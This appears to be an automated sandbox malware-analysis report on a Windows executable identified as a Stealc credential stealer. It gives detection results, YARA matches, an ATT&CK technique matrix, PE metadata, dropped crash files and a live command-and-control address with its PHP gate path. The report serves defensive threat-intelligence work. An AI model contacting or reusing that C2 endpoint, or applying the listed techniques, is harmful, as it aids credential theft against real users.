                      Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                      Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.2.716b3c89802c1713871667444720e62f3fc064c9910a1.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.716b3c89802c1713871667444720e62f3fc064c9910a1.exe.2cf0e67.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.716b3c89802c1713871667444720e62f3fc064c9910a1.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.716b3c89802c1713871667444720e62f3fc064c9910a1.exe.4810000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.716b3c89802c1713871667444720e62f3fc064c9910a1.exe.4810000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.716b3c89802c1713871667444720e62f3fc064c9910a1.exe.2cf0e67.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1575221950.0000000002EB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1470065487.0000000004810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe PID: 7652, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.2.716b3c89802c1713871667444720e62f3fc064c9910a1.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.716b3c89802c1713871667444720e62f3fc064c9910a1.exe.2cf0e67.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.716b3c89802c1713871667444720e62f3fc064c9910a1.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.716b3c89802c1713871667444720e62f3fc064c9910a1.exe.4810000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.716b3c89802c1713871667444720e62f3fc064c9910a1.exe.4810000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.716b3c89802c1713871667444720e62f3fc064c9910a1.exe.2cf0e67.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1575221950.0000000002EB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1470065487.0000000004810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe PID: 7652, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Native API
                      1
                      DLL Side-Loading
                      11
                      Process Injection
                      1
                      Masquerading
                      OS Credential Dumping2
                      System Time Discovery
                      Remote ServicesData from Local System1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Virtualization/Sandbox Evasion
                      LSASS Memory31
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable Media2
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                      Disable or Modify Tools
                      Security Account Manager1
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Process Injection
                      NTDS11
                      Process Discovery
                      Distributed Component Object ModelInput Capture12
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets1
                      Account Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                      Obfuscated Files or Information
                      Cached Domain Credentials1
                      System Owner/User Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                      Software Packing
                      DCSync1
                      File and Directory Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc Filesystem123
                      System Information Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      716b3c89802c1713871667444720e62f3fc064c9910a1.exe47%ReversingLabsWin32.Trojan.CrypterX
                      716b3c89802c1713871667444720e62f3fc064c9910a1.exe100%AviraHEUR/AGEN.1312567
                      716b3c89802c1713871667444720e62f3fc064c9910a1.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://upx.sf.net0%URL Reputationsafe
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      http://62.204.41.177/edd20096ecef326d.phptrue
                        unknown
                        http://62.204.41.177/true
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://62.204.41.177/edd20096ecef326d.phpz(716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EF4000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://62.204.41.177/edd20096ecef326d.phpO716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EF4000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://62.204.41.177-716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://62.204.41.177/edd20096ecef326d.php&(716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://62.204.41.177/edd20096ecef326d.php~716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://62.204.41.177/9716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://upx.sf.netAmcache.hve.5.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://62.204.41.177/edd20096ecef326d.php1f-9bc86c8e8c94716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://62.204.41.177/3#716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://62.204.41.177/edd20096ecef326d.phpy716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://62.204.41.177/ows716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://62.204.41.177/D716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://62.204.41.177716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1574803035.0000000002E7E000.00000004.00000020.00020000.00000000.sdmp, 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EB3000.00000004.00000020.00020000.00000000.sdmptrue
                                                  unknown
                                                  http://62.204.41.177/edd20096ecef326d.phpB716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://62.204.41.177Cc$716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1574803035.0000000002E7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      62.204.41.177
                                                      unknownUnited Kingdom
                                                      30798TNNET-ASTNNetOyMainnetworkFItrue
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1542869
                                                      Start date and time:2024-10-26 19:02:06 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 4m 48s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:13
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:716b3c89802c1713871667444720e62f3fc064c9910a1.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.evad.winEXE@2/5@0/1
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 23
                                                      • Number of non-executed functions: 165
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 20.189.173.22
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • VT rate limit hit for: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe
                                                      TimeTypeDescription
                                                      13:03:20API Interceptor1x Sleep call for process: WerFault.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      62.204.41.177jicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                      • 62.204.41.177/edd20096ecef326d.php
                                                      c4da1217278a52b300055859db330a4a3dca4ad09fe56.exeGet hashmaliciousStealcBrowse
                                                      • 62.204.41.177/edd20096ecef326d.php
                                                      w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                      • 62.204.41.177/edd20096ecef326d.php
                                                      jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                      • 62.204.41.177/edd20096ecef326d.php
                                                      mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                      • 62.204.41.177/edd20096ecef326d.php
                                                      Ondso1o6Yz.exeGet hashmaliciousStealcBrowse
                                                      • 62.204.41.177/edd20096ecef326d.php
                                                      BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                      • 62.204.41.177/edd20096ecef326d.php
                                                      ZDW7Di1Ykf.exeGet hashmaliciousStealc, VidarBrowse
                                                      • 62.204.41.177/edd20096ecef326d.php
                                                      cdc57Mn7dE.exeGet hashmaliciousStealcBrowse
                                                      • 62.204.41.177/edd20096ecef326d.php
                                                      v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                      • 62.204.41.177/edd20096ecef326d.php
                                                      No context
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      TNNET-ASTNNetOyMainnetworkFIjicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                      • 62.204.41.177
                                                      c4da1217278a52b300055859db330a4a3dca4ad09fe56.exeGet hashmaliciousStealcBrowse
                                                      • 62.204.41.177
                                                      w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                      • 62.204.41.177
                                                      jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                      • 62.204.41.177
                                                      mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                      • 62.204.41.177
                                                      Ondso1o6Yz.exeGet hashmaliciousStealcBrowse
                                                      • 62.204.41.177
                                                      BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                      • 62.204.41.177
                                                      ZDW7Di1Ykf.exeGet hashmaliciousStealc, VidarBrowse
                                                      • 62.204.41.177
                                                      cdc57Mn7dE.exeGet hashmaliciousStealcBrowse
                                                      • 62.204.41.177
                                                      v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                      • 62.204.41.177
                                                      No context
                                                      No context
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.0055997405376162
                                                      Encrypted:false
                                                      SSDEEP:192:AXEjdc2D0/oFDjMhZrMZtzuiFJZ24IO8+s:4Idc2w/oFDjjTzuiFJY4IO8+s
                                                      MD5:C0244B8FD84857B1126D55BCF0F1400D
                                                      SHA1:2D928AB19BA05EF98A52C83918E08242CD7FF83A
                                                      SHA-256:F23D6FF4AF15F1E0FF4DC2B0FABB43C05354FCAC83E5795C8EE5B07690CF8989
                                                      SHA-512:8BEBCD314186ACB3DC0531682F01EE5FF9F6B20DBDCDAE3716B51970BF9EA49B6893B3F571D6800A99756EDC4894654B48FDCE9AAF1ED2322257872778E0EA6C
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.4.3.5.7.9.3.2.6.1.4.2.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.4.3.5.7.9.3.7.3.0.1.7.9.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.8.e.8.b.6.9.5.-.8.c.6.e.-.4.1.e.2.-.a.a.f.d.-.4.f.2.f.f.9.0.9.0.3.3.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.3.0.b.4.8.7.3.-.8.9.e.3.-.4.6.5.7.-.8.f.f.d.-.f.0.a.1.a.e.5.1.6.4.c.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.7.1.6.b.3.c.8.9.8.0.2.c.1.7.1.3.8.7.1.6.6.7.4.4.4.7.2.0.e.6.2.f.3.f.c.0.6.4.c.9.9.1.0.a.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.e.4.-.0.0.0.1.-.0.0.1.4.-.6.e.c.7.-.0.f.e.c.c.8.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.a.2.4.4.4.c.2.0.5.8.3.4.5.0.a.9.1.2.5.2.b.2.f.e.3.e.d.a.f.6.7.0.0.0.0.f.f.f.f.!.0.0.0.0.3.4.0.0.c.a.c.a.0.c.5.2.7.5.4.0.f.0.4.5.a.2.f.2.6.e.d.e.b.9.2.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Sat Oct 26 17:03:13 2024, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):60732
                                                      Entropy (8bit):1.9297569386411033
                                                      Encrypted:false
                                                      SSDEEP:192:LtCXP4gEiblTgpX2a43/UOEOJwt4eZ/WzsU/EsIWnfpYG3SOsE4X2ZotiSzTY5rT:FgEibhl3/bEEI4G+zsqzYGXHfocS5+h
                                                      MD5:5C8B9C6A08D10CCA40D5BC18B8D1A11E
                                                      SHA1:1F0E7F2F4ADB96BBD82EB39EAE21867C2DA70E19
                                                      SHA-256:2D7808A0CA73052BA738FE3A90DC9D9989845DC1207CAE9DCFFC603F20406B1F
                                                      SHA-512:F3E9402FD8AFCCF357EB0591992A8E84E73703EFD0482FBFFBB8C19B08C95F21B8F5819C37C9AD840E52605EF79E20E94AC980BFCA60C3EC441963A7AA61857C
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:MDMP..a..... ........ .g............4...............<............*..........T.......8...........T...........(3..........................................................................................................eJ......H.......GenuineIntel............T............ .g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8550
                                                      Entropy (8bit):3.7030428278917475
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJIG6CA6YSNSU9Vj5gmfhapDM89bEzsf0Rsm:R6lXJZ6N6Y4SU9Vj5gmfh+EYfC
                                                      MD5:4D7EB6785DD5FED09F18791132F1837A
                                                      SHA1:D90D5190B8227213635C5DEA7E8E95BBEBDE6950
                                                      SHA-256:819FAA5D300ED5708029E2DB30C4DE9A28F26D374A6B7C72F4493E026BA1F612
                                                      SHA-512:D03C2399E6ACB17F375A314172798E40D397C0557240E594F556303C54ED317F082DD34D96B83E479079EC5CE4CA56A5E2BEDDA07D5D76C816B9CDAEFE2E763E
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.5.2.<./.P.i.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4824
                                                      Entropy (8bit):4.535887071461808
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zsIJg77aI97IWpW8VYDYm8M4JQolzT6Ff+q83vgGFe5Ogfn9fRd:uIjfOI7xh7V3JQo9TUAvH45zf9fRd
                                                      MD5:09EF4001F8D97B22FCAA99BB62060CFD
                                                      SHA1:0819D1FAF8CDCC20379BB21ABB0CF00F3E105346
                                                      SHA-256:E56BDE48B6E90FD475D300C103F3656EB839AA3BFD7590D08654DE7FDD798296
                                                      SHA-512:ECC62C734A4679B64D905459F5A40C7FD7411E6FEB5716CDCACFF60056EFD15647EDB8142D65E78D97E340FB275C016D197F50BD785E6023BB2F447F7EA1AEF7
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="560645" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):1835008
                                                      Entropy (8bit):4.37233086434841
                                                      Encrypted:false
                                                      SSDEEP:6144:7FVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNLiL:BV1QyWWI/glMM6kF7hq
                                                      MD5:4C326C6FB2F1225FE75A46F54272967E
                                                      SHA1:399B3441B71D922A9875180CC66879D34F66E884
                                                      SHA-256:1ADA4C74BCA726A915BA7EE3C45A6ABB87967AB438662810DA5D1FC3ED90B2B4
                                                      SHA-512:5A950C32BD978C1CAF89F05DBE783930BE027B64A63F035D348755A07CC2C85A110AF3D1B15310923D32BC786C05DAA4F67EF2F0FCB727FF3E51A1FC7130100D
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..7..'............................................................................................................................................................................................................................................................................................................................................... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):6.590198301045277
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.53%
                                                      • InstallShield setup (43055/19) 0.43%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:716b3c89802c1713871667444720e62f3fc064c9910a1.exe
                                                      File size:388'608 bytes
                                                      MD5:97035a2f339214f0fcd8ab6a3f4a259e
                                                      SHA1:3400caca0c527540f045a2f26edeb92deb85cab9
                                                      SHA256:716b3c89802c1713871667444720e62f3fc064c9910a194d89f5d076b3761485
                                                      SHA512:0ac46c5f0d6b9e1fa1bdcf3a4758d8855c94ef097776855267dc50a274dee4075a7238ecb361170f7cc729b3bfdbd1efac6d1abeb32464c8749fec884bcd2147
                                                      SSDEEP:6144:tL6I4MyKcIF3dlNrUFWMnra9x3guHGPDW7FTSbLV3iEXonBHwo:t14MyZm3dgI3OPDA6LV3iwc
                                                      TLSH:C1846B22EEB25812FE766B315D2B869CE66FBC61DE7C516D61503E0F08333B19912732
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4.c.U.0.U.0.U.0E.@0.U.0..R0.U.0..C0.U.0..U0.U.0...0.U.0.U.0.U.0..\0.U.0..B0.U.0..G0.U.0Rich.U.0........................PE..L..
                                                      Icon Hash:351a111114911409
                                                      Entrypoint:0x40171e
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x64F30EB2 [Sat Sep 2 10:30:10 2023 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:0
                                                      File Version Major:5
                                                      File Version Minor:0
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:0
                                                      Import Hash:9eb5b29baf071d2c96e57b7e9a18e804
                                                      Instruction
                                                      call 00007F1EE4B391AEh
                                                      jmp 00007F1EE4B35C8Eh
                                                      mov edi, edi
                                                      push ebp
                                                      mov ebp, esp
                                                      sub esp, 00000328h
                                                      mov dword ptr [0043D480h], eax
                                                      mov dword ptr [0043D47Ch], ecx
                                                      mov dword ptr [0043D478h], edx
                                                      mov dword ptr [0043D474h], ebx
                                                      mov dword ptr [0043D470h], esi
                                                      mov dword ptr [0043D46Ch], edi
                                                      mov word ptr [0043D498h], ss
                                                      mov word ptr [0043D48Ch], cs
                                                      mov word ptr [0043D468h], ds
                                                      mov word ptr [0043D464h], es
                                                      mov word ptr [0043D460h], fs
                                                      mov word ptr [0043D45Ch], gs
                                                      pushfd
                                                      pop dword ptr [0043D490h]
                                                      mov eax, dword ptr [ebp+00h]
                                                      mov dword ptr [0043D484h], eax
                                                      mov eax, dword ptr [ebp+04h]
                                                      mov dword ptr [0043D488h], eax
                                                      lea eax, dword ptr [ebp+08h]
                                                      mov dword ptr [0043D494h], eax
                                                      mov eax, dword ptr [ebp-00000320h]
                                                      mov dword ptr [0043D3D0h], 00010001h
                                                      mov eax, dword ptr [0043D488h]
                                                      mov dword ptr [0043D384h], eax
                                                      mov dword ptr [0043D378h], C0000409h
                                                      mov dword ptr [0043D37Ch], 00000001h
                                                      mov eax, dword ptr [0043C004h]
                                                      mov dword ptr [ebp-00000328h], eax
                                                      mov eax, dword ptr [0043C008h]
                                                      mov dword ptr [ebp-00000324h], eax
                                                      call dword ptr [000000ECh]
                                                      Programming Language:
                                                      • [C++] VS2008 build 21022
                                                      • [ASM] VS2008 build 21022
                                                      • [ C ] VS2008 build 21022
                                                      • [IMP] VS2005 build 50727
                                                      • [RES] VS2008 build 21022
                                                      • [LNK] VS2008 build 21022
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3ab5c0x3c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x27430000x20570.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
